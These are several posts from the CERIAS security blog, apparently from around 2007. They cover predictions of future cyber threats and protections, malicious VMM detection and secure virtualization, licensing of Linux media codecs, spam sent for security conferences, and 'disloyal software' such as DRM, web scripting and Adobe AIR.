The Center for Education and Research in Information Assurance and Security (CERIAS)

The Center for Education and Research in
Information Assurance and Security (CERIAS)

CERIAS Blog

Page Content

Gazing in the Crystal Ball

Share:

[tags]future technology, cyber security predictions, malware, bots, privacy, cyber crime[/tags]
Four times in the last month I have been contacted by people asking my predictions for future cyber security threats and protections.  One of those instances will be as I serve on a panel at the Information Security Decisions Conference in Chicago next week; we’ll be talking about the future of infosec. 

Another instance when I was contacted was by the people at Information Security magazine for their upcoming 10th anniversary issue.  I was interviewed back in 2002, and my comments were summarized in a “crystal ball” article.  Some of those predictions were more like trend predictions, but I think I did pretty well.  Most happened, and a couple may yet come to pass (I didn’t say they would all happen in 5 years!). I had a conversation with one of the reporters for the Nov 2007 issue, and provided some more observations looking forward.

After answering several of these requests, I thought it might be worthwhile to validate my views.  So, I wrote up a list of things I see happening in security as we go forward.  Then I polled (what I thought) was a small set of colleagues; thru an accident of mail aliases, a larger group of experts got my query.  (The mailer issue may be fodder for a future blog post.)  I got about 20 thoughtful replies from some real experts and deep thinkers in the field.

What was interesting is that while reading the replies, I found only a few minor differences from what I had already written!  Either that means I have a pretty good view of what’s coming, or else the people I asked are all suffering under the same delusions. 

Of course, none of us made predictions as are found in supermarket tabloids, along the lines of “Dick Cheney will hack into computers running unpatched Windows XP at the Vatican in February in an attempt to impress Britney Spears.”  Although we might generate some specific predictions like that, I don’t think our crystal balls have quite the necessary resolution.  Plus, I’m sure the Veep’s plans along those lines are classified, and we might end up in Gitmo for revealing them.  Nonetheless, I’d like to predict that I will win the Powerball Lottery, but will be delayed collecting the payout because Adriana Lima has become so infatuated with me, she has abducted me.  Yes, I’d like to predict that, but I think the Cheney prediction might be more likely….

But seriously, here are some of my predictions/observations of where we’re headed with cyber security.  (I’m not going to name the people who responded to my poll, because when I polled them I said nothing about attributing their views in public; I value my friends’ privacy as much or more than their insights!  However, my thanks again to those who responded.) 

If all of these seem obvious to you, then you are probably working in cyber security or have your own crystal ball.

Threats
Expect attack software to be the dominant threat in the coming few years.  As a trend, we will continue to see fewer overt viruses and worm programs as attacks, but continuing threats that hijack machines with bots, trojans, and browser subversion. Threats that self-modify to avoid detection, and threats that attack back against defenders will make the situation even more challenging.  It will eventually be too difficult to tell if a system is compromised and disinfect it—the standard protocol will be to reformat and reinstall upon any question.

Spam, pop-up ads, and further related advertising abuses will grow worse (as difficult as that is to believe), and will continue to mask more serious threats.  The ties between spam and malware will increase.  Organized crime will become more heavily involved in both because of the money to be made coupled with the low probability of prosecution.

Extortion based on threats to integrity, availability, or exposure of information will become more common as systems are invaded and controlled remotely.  Extortion of government entities may be threatened based on potential attacks against infrastructure controls.  These kinds of losses will infrequently be revealed to the public.

Theft of proprietary information will increase as a lucrative criminal activity.  Particularly targeted will be trade secret formulations and designs, customer lists, and supply chain details.  The insider threat will grow here, too.

Expect attacks against governmental systems, and especially law enforcement systems, as criminals seek to remove or damage information about themselves and their activities.

Protections
Fads will continue and will seem useful to early adopters, but as greater roll-out occurs, deficiencies will be found that will make them less effective—or possibly even worse than what they replace.  Examples include overconfident use of biometrics and over-reliance on virtualization to protect systems.  Mistaken reliance on encryption as a solution will also be a repeated theme.

We will continue to see huge expenditures on R&D to retrofit security onto fundamentally broken technologies rather than on re-engineering systems according to sound security principles.  Governments and many companies will continue to stress the search for “new” ideas without adequately applying older, proven techniques that might be somewhat inconvenient even though effective.

There will be continued development of protection technologies out of proportion to technologies that will enable us to identify and punish the criminals.  It will be a while before the majority of people catch on that passive defense alone is not enough and begin to appropriately capitalize investigation and law enforcement.  We will see more investment in scattered private actions well before we see governments stepping up.

White-listing and integrity management solutions will become widely used by informed security professionals as they become aware of how impossible it is to detect all bad software and behavior (blacklisting).  Meanwhile, because of increasing stealth and sophistication of attacks, many victims will not realize that their traditional IDS/anti-virus solutions based on blacklists have failed to protect them. 

White-listing will also obviate the competition among some vendors to buy vulnerabilities, and solve the difficulty of identifying zero-day attacks, because it is not designed to trigger on those items.  However, it may be slow to be adopted because so much has been invested in traditional blacklist technologies: firewalls, IDS/NIDS/IPS, antivirus, etc.

Greater emphasis will be placed on positive identity management, both online and in the physical world.  Coupled with access control, this will provide some solutions but further erode privacy.  Thus, it is uncertain how widely these technologies will be embraced.  TSA and too much of the general public will still believe that showing a picture ID somehow improves security, so the way ahead in authentication/identification is uncertain.

Personnel
We will continue to see more people using sensitive systems, but not enough people trained in cyber protection.  This will continue some current trends such as people with questionable qualifications calling themselves “experts,” and more pressure for certifications and qualifications to demonstrate competence (and more promotion of questionable certifications to meet that need).

Many nations will face difficulties finding appropriately educated and vetted experts who are also capable of getting national-level clearances.  Industry may also find it difficult to find enough trained individuals without criminal records, which will lead to greater reliance on outsourcing.  It will also mean that we will continue to see instances where poorly-informed individuals mistakenly think that single technologies will solve all all their problems—with firewalls and encryption being two prime examples.

Personnel for after-the-fact investigations (both law enforcement and civil) will be in high demand and short supply.

Much greater emphasis needs to be placed on educating the end-user population about security and privacy, but this will not receive sufficient support or attention. 

The insider threat will become more pronounced because systems are mostly still being designed and deployed with perimeter defenses.

Milieu
Crime, identity theft, and violations of privacy will increasingly become part of public consciousness.  This will likely result in reduction of trust in on-line services.  This may also negatively impact development of new services and products, but there will still be great adoption of new technologies despite their unknown risk models; VoIP is an example.

Some countries will become known as havens for computer criminals.  International pressure will increase on those countries to become “team players” in catching the criminals.  This will not work well in those countries where the government has financial ties to the criminals or has a political agenda in encouraging them.  Watch for the first international action (financial embargo?) on this issue within the next five years.

We will see greater connectivity, more embedded systems, and less obvious perimeters.  This will require a change in how we think about security (push it into the devices and away from network core, limit functionality), but the changes will be slow in coming.  Advertisers and vendors will resist these changes because some of their revenue models would be negatively impacted.

Compliance rules and laws will drive some significant upgrades and changes, but not all will be appropriate as the technology changes.  Some compliance requirements may actually expose organizations to attack.  Related to compliance, the enforcement of external rights (e.g., copyright using DRM) will lead to greater complexity in systems, more legal wrangling, and increased user dissatisfaction with some IT products.

More will be spent in the US on DRM enforcement and attempts to restrict access to online pictures of naked people than is likely to be spent on cybersecurity research.  More money will be spent by the US government ensuring that people don’t take toothpaste in carry-on luggage on airplanes than will be spent on investigating and prosecuting computer fraud and violation of spam laws.

Government officials will continue to turn to industry for “expert advice”—listening to the same people who have built multinational behemoths by marketing the unsafe products that got us into this mess already.  (It’s the same reason they consult the oil executives on how to solve global warming.)  Not surprisingly, the recommendations will all be for strongly worded statements and encouragement, but not real change in behavior.

We will see growing realization that massive data stores, mirroring, RAID, backups and more mean that data never really goes away.  This will be a boon to some law enforcement activities, a terrible burden for companies in civil lawsuits, and a continuing threat to individual privacy.  It will also present a growing challenge to reconcile different versions of the same data in some meaningful way.  Purposeful pollution of the data stores around the world will be conducted by some individuals to make the collected data so conflicted and ambiguous that it cannot be used.

Overall Bottom line:  things are going to get worse before they get better, and it may be a while before things get better.

[posted with ecto]

Thoughts on Virtualization, Security and Singularity

Share:

The “VMM Detection Myths and Realities” paper has been heavily reported and discussed before.  It considers whether a theoretical piece of software could detect if it is running inside a Virtual Machine Monitor (VMM).  An undetectable VMM would be “transparent”.  Many arguments are made against the practicality or the commercial viability of a VMM that could provide performance, stealth and reproducible, consistent timings.  The arguments are interesting and reasonably convincing that it is currently infeasible to absolutely guarantee undetectability. 

However, I note that the authors are arguing from essentially the same position as atheists arguing that there is no God.  They argue that the existence of a fully transparent VMM is unlikely, impractical or would require an absurd amount of resources, both physical and in software development efforts.  This is reasonable because the VMM has to fail only once in preventing detection and there are many ways in which it can fail, and preventing each kind of detection is complex.  However, this is not an hermetic, formal proof that it is impossible and cannot exist;  a new breakthrough technology or an “alien science-fiction” god-like technology might make it possible. 

Then the authors argue that with the spread of virtualization, it will become a moot point for malware to try to detect if it is running inside a virtual machine.  One might be tempted to remark, doesn’t this argument also work in the other way, making it a moot point for an operating system or a security tool to try to detect if it is running inside a malicious VMM? 

McAfee’s “secure virtualization”
The security seminar by George Heron answers some of the questions I was asking at last year’s VMworld conference, and elaborates on what I had in mind then.  The idea is to integrate security functions within the virtual machine monitor.  Malware nowadays prevents the installation of security tools and interferes with them as much as possible.  If malware is successfully confined inside a virtual machine, and the security tools are operating from outside that scope, this could make it impossible for an attacker to disable security tools.  I really like that idea. 
 
The security tools could reasonably expect to run directly on the hardware or with an unvirtualized host OS.  Because of this, VMM detection isn’t a moot point for the defender.  However, the presentation did not discuss whether the McAfee security suite would attempt to detect if the VMM itself had been virtualized by an attacker.  Also, would it be possible to detect a “bad” VMM if the McAfee security tools themselves run inside a virtualized environment on top of the “good” VMM?  Perhaps it would need more hooks into the VMM to do this.  Many, in fact, to attempt to catch any of all the possible ways in which a malicious VMM can fail to hide itself properly.  What is the cost of all these detection attempts, which must be executed regularly?  Aren’t they prohibitive, therefore making strong malicious VMM detection impractical?  In the end, I believe this may be yet another race depending on how much effort each side is willing to put into cloaking and detection.  Practical detection is almost as hard as practical hiding, and the detection cost has to be paid everywhere on every machine, all the time.


Which Singularity?
Microsoft’s Singularity project attempts to create an OS and execution environment that is secure by design and simpler.  What strikes me is how it resembles the “white list” approach I’ve been talking about.  “Singularity” is about constructing secure systems with statements (“manifests”) in a provable manner.  It states what processes do and what may happen, instead of focusing on what must not happen. 

Last year I thought that virtualization and security could provide a revolution;  now I think it’s more of the same “keep building defective systems and defend them vigorously”, just somewhat stronger.  Even if I find the name somewhat arrogant, “Singularity” suggests a future for security that is more attractive and fundamentally stable than yet another arms race.  In the meantime, though, “secure virtualization” should help, and expect lots of marketing about it.

Legit Linux Codecs In the U.S.

Share:

As a beginner Linux user, I only recently realized that few people are aware or care that they are breaking U.S. law by using unlicensed codecs.  Even fewer know that the codecs they use are unlicensed, or what to do about it.  Warning dialogs (e.g., in Ubuntu) provide no practical alternative to installing the codecs, and are an unwelcome interruption to workflow.  Those warnings are easily forgotten afterwards, perhaps despite good intentions to correct the situation.  Due to software patents in the U.S., codecs from sound to movies such as h.264 need to be licensed, regardless of how unpalatable the law may be, and of how this situation is unfair to U.S. and Canadian citizens compared to other countries.  This impacts open source players such as Totem, Amarok, Mplayer or Rythmbox.  The CERIAS security seminars, for example, use h.264.  The issue of unlicensed codecs in Linux was brought up by Adrian Kingsley-Hughes, who was heavily criticized for not knowing about, or not mentioning, fluendo.com and other ways of obtaining licensed codecs. 

Fluendo Codecs
So, as I like Ubuntu and want to do the legal thing, I went to the Fluendo site and purchased the “mega-bundle” of codecs.  After installing them, I tried to play a CERIAS security seminar.  I was presented with a prompt to install 3 packs of codecs which require licensing.  Then I realized that the Fluendo set of codecs didn’t include h.264!  Using Fluendo software is only a partial solution.  When contacted, Fluendo said that support for h.264, AAC and WMS will be released “soon”.

Wine
Another suggestion is using Quicktime for Windows under Wine.  I was able to do this, after much work;  it’s far from being as simple as running Synaptic, in part due to Apple’s web site being uncooperative and the latest version of Quicktime, 7.2, not working under Wine.  However, when I got it to work with an earlier version of Quicktime, it worked only for a short while.  Now it just displays “Error -50: an unknown error occurred” when I attempt to play a CERIAS security seminar. 

VideoLAN Player vs MPEG LA
The VideoLAN FAQ explains why VideoLAN doesn’t license the codecs, and suggests contacting MPEG LA.  I did just that, and was told that they were unwilling to let me pay for a personal use license.  Instead, I should “choose a player from a licensed supplier (or insist that the supplier you use become licensed by paying applicable royalties)”.  I wish that an “angel” (a charity?) could intercede and obtain licenses for codecs in their name, perhaps over the objections of the developers, but that’s unlikely to happen.

What to do
Essentially, free software users are the ball in a game of ping-pong between free software authors and licensors.  Many users are oblivious to this no man’s land they somehow live in,  but people concerned about legitimacy can easily be put off by it.  Businesses in particular will be concerned about liabilities.  I conclude that Adrian was right in flagging the Linux codec situation.  It is a handicap for computer users in the U.S. compared to countries where licensing codecs isn’t an issue.

One solution would be to give up Ubuntu (for example) and getting a Linux distribution that bundles licensed codecs such as Linspire (based on Ubuntu) despite the heavily criticized deal they made with Microsoft.  This isn’t about being anti-Microsoft, but about divided loyalties.  Free software, for me, isn’t about getting software for free, even though that’s convenient.  It’s about appreciating the greater assurances that free software provides with regards to divided loyalties and the likelihood of software that is disloyal by design.  Now Linspire may have or in the future get other interests in mind besides those of its users.  This deal being part of a vague but threatening patent attack on Linux by Microsoft also makes Linspire unappealing.  Linspire is cheap, so cost isn’t an issue;  after all getting the incomplete set of codecs from Fluendo ($40) cost me almost as much as getting the full version of Linspire ($49) would have.  Regardless,  Linspire may be an acceptable compromise for many businesses.  Another advantage of Linspire is that they bundle a licensed DVD player as well (note that the DMCA, and DVD CCA license compliance, are separate issues from licensing codecs such as h.264).

Another possibility is to keep around an old Mac or use lab computers until Fluendo releases the missing codecs.  Even if CERIAS was to switch to Theora just to please me, the problem would surface again later.  So, there are options, but they aren’t optimal. 

Hypocritical Security Conference Organizers

Share:

Every once in a while, I receive spam for security conferences of which I’ve never heard, even less attended.  Typically the organizers of these conferences are faculty members, professors, or government agency employees who should know better than hire companies to spam for them.  I suppose that hiring a third party provides plausible deniability.  It’s hypocritical.  To be fair, I once received an apology for a spamming, which demonstrated that those involved understood integrity.

It’s true that it’s only a minor annoyance.  But, if you can’t trust someone for small things, should you trust them for important ones?

Disloyal Software

Share:

Disloyal software surrounds us.  This is software running on devices or computers you own and that serves interests other than yours.  Examples are DVD firmware that insists on making you watch the silly FBI warning or prevents you from skipping “splashes” or previews, or popup and popunder advertisement web browser windows.  When people discuss malware or categories of software, there is usually little consideration for disloyal software (I found this interesting discussion of Trusted Computing).  Some of it is perfectly legal; some protects legal rights.  At the other extreme, rootkits can subvert entire computers against their owners.  The question is, when can you trust possibly disloyal software, and when does it become malware, such as the Sony CD copy prevention rootkit?

Who’s in Control
Loyalty is a question of perspective in ownership vs control.  The employer providing laptops and computers to employees doesn’t want them to install things that could be liabilities or compromise the computer.  The employee is using software that is restrictive but justifiably so.  From the perspective of someone privately owning a computer, a lesser likelihood of disloyalty is an advantage of free software (as in the FSF free software definition).  The developers won’t benefit from implementing restrictions and developing software that does things that go counter to the interests of the user.  If one does, someone somewhere will likely remove that restriction for the benefit of all.  Of course, this doesn’t address the possibility of cleverly hidden capabilities (such as backdoors) or compromised source code repositories.

This leads to questions of control of many other devices, such as game consoles and media players such as the iPod.  Why does my iPod, using Apple-provided software, not allow me to copy music files to another computer?  It doesn’t matter which computer as long as I’m not violating copyrights;  possibly it’s the same computer that ripped the CDs, because the hard drive died or was upgraded, or it’s the new computer I just bought.  By using the iPod as a storage device instead of a music player, such copies can be done with Apple software, but music files in the “play” section can’t be copied out.  This restriction is utterly silly as it accomplishes nothing but annoy owners, and I’m glad that Ubuntu Linux allows direct access to the music files.

DMCA
Some firmware implements copyright protection measures, and modifying it to remove those protections is made illegal by the DMCA.  As modifying consoles (“modding”) is often done for that purpose, the act of “modding” has become suspicious in itself.  Someone modding a DVD player to simply be able to bypass annoying splash screens, but without affecting copy protection mechanisms, would have a hard time defending herself.  This has a chilling effect on the recycling of perfectly good hardware with better software.  For example, I think Microsoft would still be selling large quantities of the original XBox if the compiled XBMC media player software wasn’t illegal as well for most people due to licensing issues with the Microsoft compiler.  The DMCA helps law enforcement and copyright holders, but has negative effects as well (see wikipedia).  Disloyal devices are distasteful, and the current law heavily favors copyright owners.  Of course, it’s not clearcut, especially in devices that have responsibilities towards multiple entities, such as cell phones.  I recommend watching Ron Buskey’s security seminar about cell phones.

Web Me Up
If you think you’re using only free software, you’re wrong every time you use the web and allow scripting.  The potentially ultimate disloyal software is the one web sites push to your browser.  Active content (JavaScript, Flash, etc…) on web pages can glue you in place and restrict what you can do and how, or deploy adversarial behaviors (e.g., pop-unders or browser attacks).  Every time you visit a web page nowadays, you download and run software that is not free:

* it is often impractical to access the content of the page, or even basic form functionality, without running the software, so you do not have the freedom to run or not run it as a practical choice (in theory you do have a choice, but penalties for choosing the alternative can be significant).

* It is difficult to study given how some code can load other active content from other sites in a chain-like fashion, creating a large spaghetti, which can be changed at any time.

* there is no point to redistributing copies, as the copies running from the web sites you need to use won’t change. 

* Releasing your “improvements” to the public would almost certainly violate copyrights. Even if you made useful improvements, the web site owners could change how their site works regularly, thus foiling your efforts.

Most of the above is true even if the scripts you are made to run in a browser were free software from the point of view of the web developers;  the delivery method tainted them.

Give me some AIR
The Adobe Integrated Runtime (“AIR”) is interesting because it has the potential to free web technologies such as HTML, Flash and JavaScript, by allowing them to be used in a free open source way.  CERIAS webmaster Ed Finkler developed the “Spaz” application with it, and licensed it with the New BSD license.  I say potentially only, because AIR can be used to dynamically load software as well, with all the problems of web scripting.  It’s a question of control and trust.  I can’t trust possibly malicious code that I am forced to run on my machine to access a web page which I happen to visit.  However, I may trust static code that is free software, to not be disloyal by design.  If it is disloyal, it is possible to fix it and redistribute the improved code.  AIR could deliver that, as Ed demonstrated.

The problem with AIR is that I will have to trust a web developer with the security of my desktop.  AIR has two sandboxes, the Classic Sandbox that is like a web browser, and the Application Sandbox, which is compared to server-side applications except they run locally (see the AIR security FAQ).  The Application Sandbox allows local file operations that are typically forbidden to web browsers, but without some of the more dangerous web browser functionality.  Whereas the technological security model makes sense as a foundation, its actual security is entirely up to whoever makes the code that runs in the Application Sandbox.  People who have no qualms about pushing code to my browser and forcing me to turn on scripting, thus making me vulnerable to attacks from sites I will visit subsequently, to malicious ads, or to code injected into their site, can’t be trusted to care if my desktop is compromised through their code, or to be competent to prevent it.

Even the security FAQ for AIR downplays significant risks.  For example, it says “The damage potential from an injection attack in a given website is directly proportional to the value of the website itself. As such, a simple website such as an unauthenticated chat or crossword site does not have to worry much about injection attacks as much as any damage would be annoying at most.”  This completely ignores scripting-based attacks against the browsers themselves, such as those performed by the well-known malwares Mpack and IcePack.  In addition, there probably will be both implementation and design vulnerabilities found in AIR itself.

Either way, AIR is a development to watch.

P.S. (10/16): What if AIR attracts the kind of people that are responsible for flooding the National Vulnerability Database with PHP server application vulnerabilities?  Server applications are notoriously difficult to write securely.  Code that they would write for the application sandbox could be just as buggy, except that instead of a few compromised servers, there could be a large quantity of compromised personal computers…